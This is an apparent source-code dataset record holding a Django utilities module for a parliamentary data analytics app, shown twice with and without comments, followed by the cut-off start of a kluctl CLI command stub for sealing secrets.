] | 1 | 2021-04-19T07:30:06.000Z | 2021-04-19T07:30:06.000Z | parlalize/utils.py | VesterDe/parlalize | b725fe4b55b95f2ad3505aa70dac2474269ea3da | [
"Unlicense"
] | null | null | null | parlalize/utils.py | VesterDe/parlalize | b725fe4b55b95f2ad3505aa70dac2474269ea3da | [
"Unlicense"
] | null | null | null | # -*- coding: UTF-8 -*-
import numpy
from datetime import datetime, timedelta
from django.http import Http404, JsonResponse, HttpResponse
import requests
from parlaposlanci.models import (Person, StyleScores, CutVotes, MPStaticPL,
MembershipsOfMember, LessEqualVoters,
EqualVoters, Presence,
AverageNumberOfSpeechesPerSession,
VocabularySize, Compass, SpokenWords,
LastActivity, MinisterStatic)
from parlaskupine.models import (Organization, WorkingBodies,
CutVotes as CutVotesPG,
DeviationInOrganization, LessMatchingThem,
MostMatchingThem, PercentOFAttendedSession,
MPOfPg, PGStatic,
VocabularySize as VocabularySizePG,
StyleScores as StyleScoresPG)
from parlaseje.models import (VoteDetailed, Session, Vote, Ballot, Speech,
PresenceOfPG, AbsentMPs, VoteDetailed)
from parlalize.settings import (VOTE_MAP, API_URL, BASE_URL, API_DATE_FORMAT,
DEBUG)
from django.contrib.contenttypes.models import ContentType
import requests
import json
import numpy as np
import time
import csv
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from parlalize.settings import SETTER_KEY
def lockSetter(function):
def wrap(request, *args, **kwargs):
if request:
setterKey = request.GET.get('key')
if str(setterKey) == str(SETTER_KEY):
return function(request, *args, **kwargs)
else:
raise PermissionDenied
else:
return function(*args, **kwargs)
return wrap
def tryHard(url):
data = None
counter = 0
while data is None:
try:
if counter > 2:
client.captureMessage(url+' je zahinavu več ko 2x.')
return
data = requests.get(url)
except:
counter += 1
time.sleep(5)
pass
return data
def normalize(val, max_):
try:
return round((float(val)*100)/float(max_))
except:
return val
# checks if cards with the data exists or not
# DEPRICATED
def saveOrAbort(model, **kwargs):
savedModel = model.objects.filter(**kwargs)
if savedModel:
# Add cards which has always uninqe data
if model != LastActivity:
lastModel = model.objects.latest('created_at')
if savedModel.latest('created_at').id != lastModel.id:
newModel = model(**kwargs)
newModel.save()
return True
else:
return False
else:
newModel = model(**kwargs)
newModel.save()
return True
return False
def saveOrAbortNew(model, **kwargs):
# checks if cards with the data exists or not NEW
"""
usage:
watch parlaposlanci/views.py:setMembershipsOfMember
if you use saveOrAbortNew in setter you need to use
getPersonCardModelNew in getter
"""
def save_it(model, created_for, **kwargs):
kwargs.update({'created_for': created_for})
newModel = model(**kwargs)
newModel.save()
return True
if model != LastActivity:
created_for = kwargs.pop('created_for')
# print kwargs
savedModel = model.objects.filter(**kwargs)
if savedModel:
if 'person' in kwargs:
if model != LastActivity:
person_id = kwargs['person'].id_parladata
cards = model.objects.filter(person__id_parladata=person_id,
created_for__lte=created_for)
if cards:
lastDate = cards.latest('created_for').created_for
else:
lastDate = datetime.min
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
elif 'organization' in kwargs:
party_id = kwargs['organization'].id_parladata
models = model.objects.filter(organization__id_parladata=party_id,
created_for__lte=created_for)
if models:
# if allready exist write in DB for thiw PG
lastDate = models.latest('created_for').created_for
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
else:
save_it(model, created_for, **kwargs)
elif 'session' in kwargs:
ses_id = kwargs['session'].id_parladata
models = model.objects.filter(session__id_parladata=ses_id)
lastDate = models.latest('created_at').created_for
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
else:
if model != LastActivity:
kwargs.update({'created_for': created_for})
newModel = model(**kwargs)
newModel.save()
return True
return False
def findDatesFromLastCard(model, id, lastParsedDate, minDate=None):
toDate = datetime.strptime(lastParsedDate, '%d.%m.%Y').date()
print model._meta.app_label
try:
if model._meta.app_label == 'parlaposlanci':
models = model.objects.filter(person__id_parladata=id)
lastCardDate = models.order_by('-created_for')[0].created_for
elif model._meta.app_label == 'parlaskupine':
models = model.objects.filter(organization__id_parladata=id)
lastCardDate = models.order_by('-created_for')[0].created_for
elif model._meta.app_label == 'parlaseje':
models = model.objects.all()
lastCardDate = models.order_by('-created_for')[0].created_for
except:
lastCardDate = datetime.strptime('02.08.2014', '%d.%m.%Y').date()
# lastCardDate = lastCardDate.replace(tzinfo=None)
if minDate:
od = datetime.strptime(minDate, '%d.%m.%Y').date()
lastCardDate = datetime.strptime(minDate, '%d.%m.%Y').date()
if od > lastCardDate:
lastCardDate = od
return [(lastCardDate+timedelta(days=days))
for days
in range((toDate-lastCardDate).days)]
def datesGenerator(stDate, toDate):
dates = [(stDate + timedelta(days=x))
for x
in range(0, (toDate - stDate).days)]
return dates
def getPersonCardModelNew(model, id, date=None, is_visible=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(person__id_parladata=id,
created_for__lte=dateObj)
else:
modelObject = model.objects.filter(person__id_parladata=id,
created_for__lte=datetime.now())
if is_visible:
modelObject = modelObject.filter(is_visible=True)
if not modelObject:
# if model == LastActivity:
# return None
if DEBUG:
raise Http404('Nismo našli kartice' + str(model)+str(id))
else:
raise Http404('Nismo našli kartice')
else:
if model == LastActivity:
latest_day = modelObject.latest('created_for').created_for
print latest_day
if len(modelObject.filter(created_for=latest_day)) > 1:
models = modelObject.filter(created_for=latest_day)
modelObject = models.latest('created_at')
else:
modelObject = modelObject.latest('created_for')
else:
date = modelObject.latest('created_for').created_for
models = modelObject.filter(created_for=date)
modelObject = models.latest('created_at')
# modelObject = modelObject.latest('created_for')
return modelObject
# DEPRICATED
def getPersonCardModel(model, id, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
if model == LastActivity:
modelObject = model.objects.filter(person__id_parladata=id,
date__lte=dateObj)
else:
dateObj
modelObject = model.objects.filter(person__id_parladata=id,
created_at__lte=dateObj)
else:
if model == LastActivity:
modelObject = model.objects.filter(person__id_parladata=id,
date__lte=datetime.now())
else:
modelObject = model.objects.filter(person__id_parladata=id,
created_at__lte=datetime.now())
if not modelObject:
if model == LastActivity:
return None
raise Http404('Nismo našli kartice')
else:
if model == LastActivity:
modelObject = modelObject.latest('date')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getPGCardModel(model, id, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(organization__id_parladata=id,
created_at__lte=dateObj)
else:
modelObject = model.objects.filter(organization__id_parladata=id,
created_at__lte=datetime.now())
if not modelObject:
raise Http404('Nismo našli kartice')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getPGCardModelNew(model, id, date=None, is_visible=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(organization__id_parladata=id,
created_for__lte=dateObj)
else:
modelObject = model.objects.filter(organization__id_parladata=id,
created_for__lte=datetime.now())
if is_visible:
modelObject = modelObject.filter(is_visible=True)
if not modelObject:
# if model == LastActivity:
# return None
raise Http404('Nismo našli kartice')
else:
date = modelObject.latest('created_for').created_for
modelObject = modelObject.filter(created_for=date).latest('created_at')
return modelObject
def getSCardModel(model, id_se, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(id_parladata=id_se,
created_at__lte=dateObj)
else:
modelObject = model.objects.filter(id_parladata=id_se,
created_at__lte=datetime.now())
if not modelObject:
raise Http404('Nismo našli kartice')
else:
modelObject = modelObject.latest('created_at')
return modelObject
# get all parliament member ID's
def getIDs():
# create persons
result = []
# getAllPeople
data = tryHard(API_URL+'/getAllPeople').json()
# data = tryHard(API_URL+'/getMPs').json()
for mp in data:
result.append(mp['id'])
return result
# get all PG ID's
def getPGIDs():
data = tryHard(API_URL+'/getAllPGsExt/').json()
return [pg for pg in data]
def getMPGovId(id_parladata):
person = Person.objects.filter(id_parladata=id_parladata)[0]
out = {'id': person.id_parladata,
'gov_id': person.gov_id}
return out
def getPersonData(id_parladata, date_=None):
if not date_:
date_ = datetime.now().strftime(API_DATE_FORMAT)
try:
data = getPersonCardModelNew(MPStaticPL, id_parladata, date_)
except:
url = API_URL + '/getPersonData/' + str(id_parladata) + '/'
guest = tryHard(url).json()
gov_id = None
if guest and guest['gov_id']:
return {
'type': 'visitor' if guest else 'unknown',
'party': {'acronym': None,
'id': None,
'name': None,
'is_coalition': None},
'name': guest['name'] if guest else None,
'gov_id': guest['gov_id'],
'id': id_parladata,
'district': None,
'gender': None,
'is_active': None,
'has_function': False,
}
else:
return {'type': 'visitor' if guest else 'unknown',
'party': {'acronym': None,
'id': None,
'name': None,
'is_coalition': None},
'name': guest['name'] if guest else None,
'gov_id': None,
'id': id_parladata,
'district': None,
'gender': None,
'is_active': None,
'has_function': False,
}
party = Organization.objects.get(id_parladata=data.party_id)
partyData = party.getOrganizationData()
return {
'type': 'mp',
'name': data.person.name,
'id': int(data.person.id_parladata),
'gov_id': data.gov_id,
'party': partyData,
'gender': data.gender,
'district': data.district,
'is_active': True if data.person.actived == 'True' else False,
'has_function': data.person.has_function,
}
def getMinistryData(id_parladata, date_=None):
if not date_:
date_ = datetime.now().strftime(API_DATE_FORMAT)
try:
data = getPersonCardModelNew(MinisterStatic, id_parladata, date_)
return {
'type': "ministry",
'name': data.person.name,
'id': int(data.person.id_parladata),
'gov_id': data.gov_id,
'party': data.party.getOrganizationData() if data.party else None,
'ministry': data.ministry.getOrganizationData() if data.ministry else None,
'gender': data.gender,
'district': data.district,
'is_active': True if data.person.actived == "True" else False,
'has_function': data.person.has_function,
}
except:
return getPersonData(id_parladata, date_)
def getPersonDataAPI(request, id_parladata, date_=None):
data = getPersonData(id_parladata, date_)
return JsonResponse(data)
def modelsData(request):
out = []
for ct in ContentType.objects.all():
m = ct.model_class()
out.append({'model': m.__module__,
'Ime modela': m.__name__,
'st:': m._default_manager.count()})
return JsonResponse(out, safe=False)
def getAllStaticData(request, force_render=False):
date_of = datetime.now().date()
date_ = date_of.strftime(API_DATE_FORMAT)
c_data = cache.get('all_statics')
if c_data and not force_render:
out = c_data
else:
PS_NP = ['poslanska skupina', 'nepovezani poslanec']
date_ = datetime.now().strftime(API_DATE_FORMAT)
out = {'persons': {}, 'partys': {}, 'wbs': {}}
for person in Person.objects.all():
personData = getPersonData(person.id_parladata,
date_)
out['persons'][person.id_parladata] = personData
parliamentary_group = Organization.objects.filter(classification__in=PS_NP)
for party in parliamentary_group:
out['partys'][party.id_parladata] = party.getOrganizationData()
working_bodies = ['odbor', 'komisija', 'preiskovalna komisija']
orgs = Organization.objects.filter(classification__in=working_bodies)
out['wbs'] = [{'id': org.id_parladata,
'name': org.name} for org in orgs]
cache.set('all_statics', out, 60 * 60 * 48)
return JsonResponse(out)
def getPersonsCardDates(request, person_id):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment; filename="'
'' + str(person_id) + ''
'.csv"')
mems = tryHard(API_URL + '/getAllTimeMemberships').json()
member_dates = [mem for mem in mems if str(mem['id']) == person_id]
dates = {}
dates['is_member'] = []
for d in member_dates:
if d['start_time']:
start = datetime.strptime(d['start_time'].split('T')[0],
'%Y-%m-%d')
else:
start = datetime(day=1, month=8, year=2014)
if d['end_time']:
end = datetime.strptime(d['end_time'].split('T')[0],
'%Y-%m-%d')
else:
end = datetime.today()
while end > start:
dates['is_member'].append(start.strftime(API_DATE_FORMAT))
start = start+timedelta(days=1)
models = {'spoken': SpokenWords,
'presence': Presence,
'style': StyleScores,
'equal': EqualVoters,
'less_equal': LessEqualVoters,
'static': MPStaticPL,
'number_of_speeches': AverageNumberOfSpeechesPerSession,
'memberships': MembershipsOfMember,
'last_activity': LastActivity,
'vocabolary_size': VocabularySize,
}
for key, model in models:
modelz = model.objects.filter(person__id_parladata=person_id)
datez = modelz.order_by('created_for').values_list('created_for',
flat=True)
dates[key] = [day.strftime(API_DATE_FORMAT) for day in datez]
writer = csv.writer(response)
keys = dates.keys()
writer.writerow(['Date']+keys)
date = datetime(day=1, month=8, year=2014)
while date < datetime.today():
print date
strDate = date.strftime(API_DATE_FORMAT)
writer.writerow([strDate]+['Yes' if strDate in dates[key] else ''
for key in keys])
date = date + timedelta(days=1)
return response
def getOrgsCardDates(request, org_id):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment; filename="'
'' + str(org_id) + ''
'.csv"')
dates = {}
models = {'PGStatic': PGStatic,
'PercentOFAttendedSession': PercentOFAttendedSession,
'MPOfPg': MPOfPg,
'MostMatchingThem': MostMatchingThem,
'LessMatchingThem': LessMatchingThem,
'DeviationInOrganization': DeviationInOrganization,
'vocabulary_size': VocabularySizePG,
'style_scores': StyleScoresPG,
}
for key, model in models:
modelz = model.objects.filter(organization__id_parladata=org_id)
datez = modelz.order_by('created_for').values_list('created_for',
flat=True)
dates[key] = [day.strftime(API_DATE_FORMAT) for day in datez]
datez = static.order_by('created_for').values_list('created_for',
flat=True)
writer = csv.writer(response)
keys = dates.keys()
writer.writerow(['Date']+keys)
date = datetime(day=1, month=8, year=2014)
while date < datetime.today():
print date
strDate = date.strftime(API_DATE_FORMAT)
writer.writerow([strDate]+['Yes' if strDate in dates[key] else ''
for key in keys])
date = date + timedelta(days=1)
return response
def monitorMe(request):
r = requests.get(BASE_URL + '/p/getMPStatic/2/')
if r.status_code == 200:
return HttpResponse('All iz well.')
else:
return HttpResponse('PANIC!')
def printProgressBar(iteration,
total,
prefix='',
suffix='',
decimals=1,
length=100,
fill='█'):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
"""
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filledLength = int(length * iteration // total)
bar = fill * filledLength + '-' * (length - filledLength)
print('\r' + prefix + '|' + bar + '|' + percent + suffix + '\r')
# Print New Line on Complete
if iteration == total:
print()
| 36.551195 | 91 | 0.562771 | import numpy
from datetime import datetime, timedelta
from django.http import Http404, JsonResponse, HttpResponse
import requests
from parlaposlanci.models import (Person, StyleScores, CutVotes, MPStaticPL,
MembershipsOfMember, LessEqualVoters,
EqualVoters, Presence,
AverageNumberOfSpeechesPerSession,
VocabularySize, Compass, SpokenWords,
LastActivity, MinisterStatic)
from parlaskupine.models import (Organization, WorkingBodies,
CutVotes as CutVotesPG,
DeviationInOrganization, LessMatchingThem,
MostMatchingThem, PercentOFAttendedSession,
MPOfPg, PGStatic,
VocabularySize as VocabularySizePG,
StyleScores as StyleScoresPG)
from parlaseje.models import (VoteDetailed, Session, Vote, Ballot, Speech,
PresenceOfPG, AbsentMPs, VoteDetailed)
from parlalize.settings import (VOTE_MAP, API_URL, BASE_URL, API_DATE_FORMAT,
DEBUG)
from django.contrib.contenttypes.models import ContentType
import requests
import json
import numpy as np
import time
import csv
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from parlalize.settings import SETTER_KEY
def lockSetter(function):
def wrap(request, *args, **kwargs):
if request:
setterKey = request.GET.get('key')
if str(setterKey) == str(SETTER_KEY):
return function(request, *args, **kwargs)
else:
raise PermissionDenied
else:
return function(*args, **kwargs)
return wrap
def tryHard(url):
data = None
counter = 0
while data is None:
try:
if counter > 2:
client.captureMessage(url+' je zahinavu več ko 2x.')
return
data = requests.get(url)
except:
counter += 1
time.sleep(5)
pass
return data
def normalize(val, max_):
try:
return round((float(val)*100)/float(max_))
except:
return val
def saveOrAbort(model, **kwargs):
savedModel = model.objects.filter(**kwargs)
if savedModel:
if model != LastActivity:
lastModel = model.objects.latest('created_at')
if savedModel.latest('created_at').id != lastModel.id:
newModel = model(**kwargs)
newModel.save()
return True
else:
return False
else:
newModel = model(**kwargs)
newModel.save()
return True
return False
def saveOrAbortNew(model, **kwargs):
"""
usage:
watch parlaposlanci/views.py:setMembershipsOfMember
if you use saveOrAbortNew in setter you need to use
getPersonCardModelNew in getter
"""
def save_it(model, created_for, **kwargs):
kwargs.update({'created_for': created_for})
newModel = model(**kwargs)
newModel.save()
return True
if model != LastActivity:
created_for = kwargs.pop('created_for')
savedModel = model.objects.filter(**kwargs)
if savedModel:
if 'person' in kwargs:
if model != LastActivity:
person_id = kwargs['person'].id_parladata
cards = model.objects.filter(person__id_parladata=person_id,
created_for__lte=created_for)
if cards:
lastDate = cards.latest('created_for').created_for
else:
lastDate = datetime.min
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
elif 'organization' in kwargs:
party_id = kwargs['organization'].id_parladata
models = model.objects.filter(organization__id_parladata=party_id,
created_for__lte=created_for)
if models:
lastDate = models.latest('created_for').created_for
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
else:
save_it(model, created_for, **kwargs)
elif 'session' in kwargs:
ses_id = kwargs['session'].id_parladata
models = model.objects.filter(session__id_parladata=ses_id)
lastDate = models.latest('created_at').created_for
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
else:
if model != LastActivity:
kwargs.update({'created_for': created_for})
newModel = model(**kwargs)
newModel.save()
return True
return False
def findDatesFromLastCard(model, id, lastParsedDate, minDate=None):
toDate = datetime.strptime(lastParsedDate, '%d.%m.%Y').date()
print model._meta.app_label
try:
if model._meta.app_label == 'parlaposlanci':
models = model.objects.filter(person__id_parladata=id)
lastCardDate = models.order_by('-created_for')[0].created_for
elif model._meta.app_label == 'parlaskupine':
models = model.objects.filter(organization__id_parladata=id)
lastCardDate = models.order_by('-created_for')[0].created_for
elif model._meta.app_label == 'parlaseje':
models = model.objects.all()
lastCardDate = models.order_by('-created_for')[0].created_for
except:
lastCardDate = datetime.strptime('02.08.2014', '%d.%m.%Y').date()
if minDate:
od = datetime.strptime(minDate, '%d.%m.%Y').date()
lastCardDate = datetime.strptime(minDate, '%d.%m.%Y').date()
if od > lastCardDate:
lastCardDate = od
return [(lastCardDate+timedelta(days=days))
for days
in range((toDate-lastCardDate).days)]
def datesGenerator(stDate, toDate):
dates = [(stDate + timedelta(days=x))
for x
in range(0, (toDate - stDate).days)]
return dates
def getPersonCardModelNew(model, id, date=None, is_visible=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(person__id_parladata=id,
created_for__lte=dateObj)
else:
modelObject = model.objects.filter(person__id_parladata=id,
created_for__lte=datetime.now())
if is_visible:
modelObject = modelObject.filter(is_visible=True)
if not modelObject:
if DEBUG:
raise Http404('Nismo našli kartice' + str(model)+str(id))
else:
raise Http404('Nismo našli kartice')
else:
if model == LastActivity:
latest_day = modelObject.latest('created_for').created_for
print latest_day
if len(modelObject.filter(created_for=latest_day)) > 1:
models = modelObject.filter(created_for=latest_day)
modelObject = models.latest('created_at')
else:
modelObject = modelObject.latest('created_for')
else:
date = modelObject.latest('created_for').created_for
models = modelObject.filter(created_for=date)
modelObject = models.latest('created_at')
return modelObject
def getPersonCardModel(model, id, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
if model == LastActivity:
modelObject = model.objects.filter(person__id_parladata=id,
date__lte=dateObj)
else:
dateObj
modelObject = model.objects.filter(person__id_parladata=id,
created_at__lte=dateObj)
else:
if model == LastActivity:
modelObject = model.objects.filter(person__id_parladata=id,
date__lte=datetime.now())
else:
modelObject = model.objects.filter(person__id_parladata=id,
created_at__lte=datetime.now())
if not modelObject:
if model == LastActivity:
return None
raise Http404('Nismo našli kartice')
else:
if model == LastActivity:
modelObject = modelObject.latest('date')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getPGCardModel(model, id, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(organization__id_parladata=id,
created_at__lte=dateObj)
else:
modelObject = model.objects.filter(organization__id_parladata=id,
created_at__lte=datetime.now())
if not modelObject:
raise Http404('Nismo našli kartice')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getPGCardModelNew(model, id, date=None, is_visible=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(organization__id_parladata=id,
created_for__lte=dateObj)
else:
modelObject = model.objects.filter(organization__id_parladata=id,
created_for__lte=datetime.now())
if is_visible:
modelObject = modelObject.filter(is_visible=True)
if not modelObject:
raise Http404('Nismo našli kartice')
else:
date = modelObject.latest('created_for').created_for
modelObject = modelObject.filter(created_for=date).latest('created_at')
return modelObject
def getSCardModel(model, id_se, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(id_parladata=id_se,
created_at__lte=dateObj)
else:
modelObject = model.objects.filter(id_parladata=id_se,
created_at__lte=datetime.now())
if not modelObject:
raise Http404('Nismo našli kartice')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getIDs():
# create persons
result = []
# getAllPeople
data = tryHard(API_URL+'/getAllPeople').json()
# data = tryHard(API_URL+'/getMPs').json()
for mp in data:
result.append(mp['id'])
return result
# get all PG ID's
def getPGIDs():
data = tryHard(API_URL+'/getAllPGsExt/').json()
return [pg for pg in data]
def getMPGovId(id_parladata):
person = Person.objects.filter(id_parladata=id_parladata)[0]
out = {'id': person.id_parladata,
'gov_id': person.gov_id}
return out
def getPersonData(id_parladata, date_=None):
if not date_:
date_ = datetime.now().strftime(API_DATE_FORMAT)
try:
data = getPersonCardModelNew(MPStaticPL, id_parladata, date_)
except:
url = API_URL + '/getPersonData/' + str(id_parladata) + '/'
guest = tryHard(url).json()
gov_id = None
if guest and guest['gov_id']:
return {
'type': 'visitor' if guest else 'unknown',
'party': {'acronym': None,
'id': None,
'name': None,
'is_coalition': None},
'name': guest['name'] if guest else None,
'gov_id': guest['gov_id'],
'id': id_parladata,
'district': None,
'gender': None,
'is_active': None,
'has_function': False,
}
else:
return {'type': 'visitor' if guest else 'unknown',
'party': {'acronym': None,
'id': None,
'name': None,
'is_coalition': None},
'name': guest['name'] if guest else None,
'gov_id': None,
'id': id_parladata,
'district': None,
'gender': None,
'is_active': None,
'has_function': False,
}
party = Organization.objects.get(id_parladata=data.party_id)
partyData = party.getOrganizationData()
return {
'type': 'mp',
'name': data.person.name,
'id': int(data.person.id_parladata),
'gov_id': data.gov_id,
'party': partyData,
'gender': data.gender,
'district': data.district,
'is_active': True if data.person.actived == 'True' else False,
'has_function': data.person.has_function,
}
def getMinistryData(id_parladata, date_=None):
if not date_:
date_ = datetime.now().strftime(API_DATE_FORMAT)
try:
data = getPersonCardModelNew(MinisterStatic, id_parladata, date_)
return {
'type': "ministry",
'name': data.person.name,
'id': int(data.person.id_parladata),
'gov_id': data.gov_id,
'party': data.party.getOrganizationData() if data.party else None,
'ministry': data.ministry.getOrganizationData() if data.ministry else None,
'gender': data.gender,
'district': data.district,
'is_active': True if data.person.actived == "True" else False,
'has_function': data.person.has_function,
}
except:
return getPersonData(id_parladata, date_)
def getPersonDataAPI(request, id_parladata, date_=None):
data = getPersonData(id_parladata, date_)
return JsonResponse(data)
def modelsData(request):
out = []
for ct in ContentType.objects.all():
m = ct.model_class()
out.append({'model': m.__module__,
'Ime modela': m.__name__,
'st:': m._default_manager.count()})
return JsonResponse(out, safe=False)
def getAllStaticData(request, force_render=False):
date_of = datetime.now().date()
date_ = date_of.strftime(API_DATE_FORMAT)
c_data = cache.get('all_statics')
if c_data and not force_render:
out = c_data
else:
PS_NP = ['poslanska skupina', 'nepovezani poslanec']
date_ = datetime.now().strftime(API_DATE_FORMAT)
out = {'persons': {}, 'partys': {}, 'wbs': {}}
for person in Person.objects.all():
personData = getPersonData(person.id_parladata,
date_)
out['persons'][person.id_parladata] = personData
parliamentary_group = Organization.objects.filter(classification__in=PS_NP)
for party in parliamentary_group:
out['partys'][party.id_parladata] = party.getOrganizationData()
working_bodies = ['odbor', 'komisija', 'preiskovalna komisija']
orgs = Organization.objects.filter(classification__in=working_bodies)
out['wbs'] = [{'id': org.id_parladata,
'name': org.name} for org in orgs]
cache.set('all_statics', out, 60 * 60 * 48)
return JsonResponse(out)
def getPersonsCardDates(request, person_id):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment; filename="'
'' + str(person_id) + ''
'.csv"')
mems = tryHard(API_URL + '/getAllTimeMemberships').json()
member_dates = [mem for mem in mems if str(mem['id']) == person_id]
dates = {}
dates['is_member'] = []
for d in member_dates:
if d['start_time']:
start = datetime.strptime(d['start_time'].split('T')[0],
'%Y-%m-%d')
else:
start = datetime(day=1, month=8, year=2014)
if d['end_time']:
end = datetime.strptime(d['end_time'].split('T')[0],
'%Y-%m-%d')
else:
end = datetime.today()
while end > start:
dates['is_member'].append(start.strftime(API_DATE_FORMAT))
start = start+timedelta(days=1)
models = {'spoken': SpokenWords,
'presence': Presence,
'style': StyleScores,
'equal': EqualVoters,
'less_equal': LessEqualVoters,
'static': MPStaticPL,
'number_of_speeches': AverageNumberOfSpeechesPerSession,
'memberships': MembershipsOfMember,
'last_activity': LastActivity,
'vocabolary_size': VocabularySize,
}
for key, model in models:
modelz = model.objects.filter(person__id_parladata=person_id)
datez = modelz.order_by('created_for').values_list('created_for',
flat=True)
dates[key] = [day.strftime(API_DATE_FORMAT) for day in datez]
writer = csv.writer(response)
keys = dates.keys()
writer.writerow(['Date']+keys)
date = datetime(day=1, month=8, year=2014)
while date < datetime.today():
print date
strDate = date.strftime(API_DATE_FORMAT)
writer.writerow([strDate]+['Yes' if strDate in dates[key] else ''
for key in keys])
date = date + timedelta(days=1)
return response
def getOrgsCardDates(request, org_id):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment; filename="'
'' + str(org_id) + ''
'.csv"')
dates = {}
models = {'PGStatic': PGStatic,
'PercentOFAttendedSession': PercentOFAttendedSession,
'MPOfPg': MPOfPg,
'MostMatchingThem': MostMatchingThem,
'LessMatchingThem': LessMatchingThem,
'DeviationInOrganization': DeviationInOrganization,
'vocabulary_size': VocabularySizePG,
'style_scores': StyleScoresPG,
}
for key, model in models:
modelz = model.objects.filter(organization__id_parladata=org_id)
datez = modelz.order_by('created_for').values_list('created_for',
flat=True)
dates[key] = [day.strftime(API_DATE_FORMAT) for day in datez]
datez = static.order_by('created_for').values_list('created_for',
flat=True)
writer = csv.writer(response)
keys = dates.keys()
writer.writerow(['Date']+keys)
date = datetime(day=1, month=8, year=2014)
while date < datetime.today():
print date
strDate = date.strftime(API_DATE_FORMAT)
writer.writerow([strDate]+['Yes' if strDate in dates[key] else ''
for key in keys])
date = date + timedelta(days=1)
return response
def monitorMe(request):
r = requests.get(BASE_URL + '/p/getMPStatic/2/')
if r.status_code == 200:
return HttpResponse('All iz well.')
else:
return HttpResponse('PANIC!')
def printProgressBar(iteration,
total,
prefix='',
suffix='',
decimals=1,
length=100,
fill='█'):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
"""
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filledLength = int(length * iteration // total)
bar = fill * filledLength + '-' * (length - filledLength)
print('\r' + prefix + '|' + bar + '|' + percent + suffix + '\r')
if iteration == total:
print()
| false | true |
1c4a8b7192fcfef250b74c73b64732c53563f6c6 | 1,585 | py | Python | kluctl/cli/seal_command_stubs.py | matzegebbe/kluctl | 1b092b921e7301a30c99792b026634e099fbf15d | [
"Apache-2.0"
] | 26 | 2021-08-18T11:18:46.000Z | 2022-03-16T09:28:43.000Z | kluctl/cli/seal_command_stubs.py | matzegebbe/kluctl | 1b092b921e7301a30c99792b026634e099fbf15d | [
"Apache-2.0"
] | 4 | 2021-09-07T09:55:29.000Z | 2022-03-03T09:05:01.000Z | kluctl/cli/seal_command_stubs.py | matzegebbe/kluctl | 1b092b921e7301a30c99792b026634e099fbf15d | [
"Apache-2.0"
] | 4 | 2021-09-04T11:52:33.000Z | 2022-03-16T09:18:20.000Z | import click
from click_option_group import optgroup
from kluctl.cli.main_cli_group import kluctl_project_args, cli_group
@cli_group.command("seal",
help="Seal secrets based on target's sealingConfig.\n\n"
"Loads all secrets from the specified secrets sets from the target's sealingConfig and "
"then renders the target, including all files with the `.sealme` extension. Then runs "
"kubeseal on each `.sealme` file and stores secrets in the directory specified by "
"`--local-sealed-secrets`, using the outputPattern from your deployment project.\n\n"
"If no `--target` is specified, sealing is performed for all targets.")
@kluctl_project_args()
@optgroup.group("Misc arguments")
@optgroup.option("--secrets-dir",
help="Specifies where to find unencrypted secret files. The given directory is NOT meant to be part "
"of your source repository! The given path only matters for secrets of type 'path'. Defaults "
"to the current working directory.",
default='.', type=click.Path(exists=True, file_okay=False))
@optgroup.option("--force-reseal",
help="Lets kluctl ignore secret hashes found in already sealed secrets and thus forces "
"resealing of those.",
is_flag=True)
@click.pass_obj
def seal_command_stub(obj, **kwargs):
from kluctl.seal.seal_command import seal_command
seal_command(obj, kwargs)
| 54.655172 | 118 | 0.643533 | import click
from click_option_group import optgroup
from kluctl.cli.main_cli_group import kluctl_project_args, cli_group
@cli_group.command("seal",
help="Seal secrets based on target's sealingConfig.\n\n"
"Loads all secrets from the specified secrets sets from the target's sealingConfig and "
"then renders the target, including all files with the `.sealme` extension. Then runs "
"kubeseal on each `.sealme` file and stores secrets in the directory specified by "
"`--local-sealed-secrets`, using the outputPattern from your deployment project.\n\n"
"If no `--target` is specified, sealing is performed for all targets.")
@kluctl_project_args()
@optgroup.group("Misc arguments")
@optgroup.option("--secrets-dir",
help="Specifies where to find unencrypted secret files. The given directory is NOT meant to be part "
"of your source repository! The given path only matters for secrets of type 'path'. Defaults "
